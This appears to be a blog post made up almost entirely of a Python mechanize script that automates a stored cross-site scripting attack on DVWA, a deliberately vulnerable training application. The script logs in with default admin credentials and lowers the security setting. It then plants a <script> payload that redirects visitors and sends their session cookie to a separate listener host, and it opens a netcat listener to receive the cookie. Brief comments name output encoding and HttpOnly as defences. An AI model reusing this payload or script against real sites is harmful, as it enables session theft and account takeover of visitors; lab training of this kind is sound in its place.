Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates exploitation of DVWA's stored cross-site scripting (XSS) vulnerability, using Python’s mechanize module for browser automation. The script injects a cookie-stealing payload into a vulnerable form and starts a listener to catch the cookie when a victim visits the page.
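#Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2
#
# Training script for the DVWA lab: it logs in, lowers DVWA's security level,
# posts a guestbook entry carrying a <script> payload, and opens a netcat
# window on the local machine to display the resulting request.
#
# Defensive takeaway: the demonstration depends on the stored message being
# rendered back without output encoding and on the session cookie being
# readable from JavaScript. Contextual HTML encoding of stored input and the
# HttpOnly cookie attribute each break this chain.
import mechanize
import sys
import os

# Credentials the script uses to log in to the lab DVWA instance.
uname = "admin"
pword = "admin"

# Lab host running DVWA, taken from the first command-line argument.
# Kept as None when the argument is missing so that main() can print a usage
# message instead of the module failing with IndexError.
rhost = sys.argv[1] if len(sys.argv) > 1 else None

# Single mechanize browser shared by all steps so the login session persists.
br = mechanize.Browser()


def loginAndReset(username, password):
    """Logs into DVWA and sets security to low.

    Submits the first form on /dvwa/login.php with the given credentials,
    follows the link matching 'security.php', and submits that page's first
    form with the 'security' control set to "low".
    """
    br.open("http://" + rhost + "/dvwa/login.php")
    br.select_form(nr=0)
    br.form['username'] = username
    br.form['password'] = password
    br.submit()  # submit the login form
    br.follow_link(url_regex=r'security.php')
    br.select_form(nr=0)  # first form on the security page
    br.form['security'] = ["low"]
    br.submit()


def storedXss():
    """Injects the xss payload into the form.

    Fills the first form on /dvwa/vulnerabilities/xss_s: 'txtName' gets a
    fixed name and 'mtxMessage' gets a comment followed by a <script> element.
    The script element redirects the viewing browser to a hard-coded lab
    address (192.168.0.3:4444) with document.cookie appended to the URL.
    """
    br.open("http://" + rhost + "/dvwa/vulnerabilities/xss_s")
    br.select_form(nr=0)
    br.form['txtName'] = "Jake"
    # NOTE(review): the callback address inside the payload is the author's
    # lab machine and is independent of rhost.
    br.form['mtxMessage'] = "Really cool stuff! Keep up the good work!<script>document.location='http://192.168.0.3:4444/cgi-bin/grab.cgi?'+document.cookie;</script>"
    br.submit()


def listener():
    """Starts a listener to catch the cookie.

    Opens a new cmd.exe window (Windows 'start') running netcat on TCP 4444.
    The command string is a fixed literal; no external input reaches the shell.
    """
    os.system(r'start cmd.exe /k "nc -nlvp 4444"')


def main():
    """Run the three lab steps in order: login/reset, inject, listen."""
    if rhost is None:
        # Without a target host every URL below would be malformed.
        sys.exit("usage: %s <dvwa-host>" % sys.argv[0])
    loginAndReset(uname, pword)
    storedXss()
    listener()


if __name__ == '__main__':
    main()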